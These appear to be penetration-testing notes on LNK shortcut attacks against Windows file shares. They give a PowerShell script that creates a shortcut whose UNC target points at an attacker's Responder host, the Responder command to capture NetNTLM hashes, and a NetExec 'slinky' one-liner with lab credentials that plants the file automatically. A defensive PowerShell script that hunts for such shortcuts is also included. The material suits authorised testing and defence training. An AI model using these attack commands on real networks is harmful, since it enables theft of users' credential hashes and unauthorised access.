LNK File Attacks
If we have write access to a share, we can place a malicious LNK file there. On the other end we run Responder; once the file is opened, Responder captures the user's NetNTLM hash.
Manual way
Step 1 - create a malicious LNK file
Create a shortcut whose target points at our Kali machine running Responder.

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
# UNC target on the Responder host: Explorer authenticates to it when it resolves the link
$lnk.TargetPath = "\\192.168.145.141\@test.png"
$lnk.WindowStyle = 1
# Icon taken from a local system DLL so the shortcut looks ordinary
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
Place the shortcut in the shared folder.
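From the defender's side, the property this shortcut relies on (a target or icon on a remote host) is exactly what to hunt for on file shares. The following PowerShell script is an added example, not part of the original notes: it scans a share for .lnk files whose TargetPath or IconLocation is a UNC path to a host outside an allowlist. The share path and the trusted-host list are assumptions supplied by the operator.

```powershell
# Added example: hunt for shortcuts on a share that point at a remote UNC path.
# A LNK whose target or icon lives on another host makes Explorer authenticate
# to that host as soon as the shortcut is rendered or opened.
param(
    [Parameter(Mandatory = $true)]
    [string]$SharePath,            # assumed, e.g. \\fileserver\public
    [string[]]$TrustedHosts = @()  # hosts that may legitimately be referenced
)

$shell = New-Object -ComObject WScript.Shell

function Get-UncHost([string]$Path) {
    # Returns the host part of a \\host\share path, or $null if the path is not UNC.
    if ($Path -match '^\\\\([^\\]+)\\') { return $Matches[1] }
    return $null
}

Get-ChildItem -Path $SharePath -Filter '*.lnk' -File -Recurse -ErrorAction SilentlyContinue |
ForEach-Object {
    # CreateShortcut on an existing .lnk loads it instead of creating a new one.
    $lnk = $shell.CreateShortcut($_.FullName)
    # IconLocation is stored as "path,index"; keep only the path part.
    $iconPath = ($lnk.IconLocation -split ',')[0].Trim()

    $checks = @{ TargetPath = $lnk.TargetPath; IconLocation = $iconPath }
    foreach ($entry in $checks.GetEnumerator()) {
        $remoteHost = Get-UncHost $entry.Value
        if ($remoteHost -and ($TrustedHosts -notcontains $remoteHost)) {
            [pscustomobject]@{
                File       = $_.FullName
                Property   = $entry.Key
                RemoteHost = $remoteHost
                Value      = $entry.Value
                Modified   = $_.LastWriteTime
            }
        }
    }
}
```

Run it as `.\Find-UncShortcuts.ps1 -SharePath \\fileserver\public -TrustedHosts fileserver` (names assumed); each hit lists the shortcut, which property is remote, and the host the client would authenticate to.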

Step 2 - run the responder
sudo responder -I eth0 -v -dP
sudo: runs Responder with root privileges (required).
responder: the main script of the Responder tool.
-I eth0: the network interface to listen on (e.g., eth0).
-v: enables verbose output.
-d: enables NBT-NS (NetBIOS Name Service) poisoning.
-P: enables the WPAD (Web Proxy Auto-Discovery Protocol) rogue proxy.

Step 3 - Exploit
When the shortcut file is opened, Responder captures the hash.


Automated Way
NetExec can do this automatically with the slinky module:
netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149
It creates the LNK file on the share for us.